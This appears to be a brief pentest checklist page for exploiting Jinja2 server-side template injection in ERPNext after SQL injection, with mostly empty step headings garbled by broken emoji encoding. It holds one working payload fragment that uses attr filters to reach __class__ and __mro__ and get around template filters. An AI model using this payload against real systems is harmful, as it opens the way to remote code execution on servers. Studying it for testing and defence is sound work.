ERPNext (SQLi -> SSTI)
π§ͺ SSTI Exploitation Checklist (Jinja2)
β
1. Confirm SSTI
π 2. Bypass Filters
𧬠3. Access MRO (Method Resolution Order)
{% set string = "ssti" %}
{% set class = "__class__" %}
{% set mro = "__mro__" %}
{% set mro_r = string|attr(class)|attr(mro) %}
{{ mro_r[1] }}𧬠4. List Subclasses
π 5. Identify Useful Classes
π£ 6. Execute Commands
π§Ό 7. Clean Output
Last updated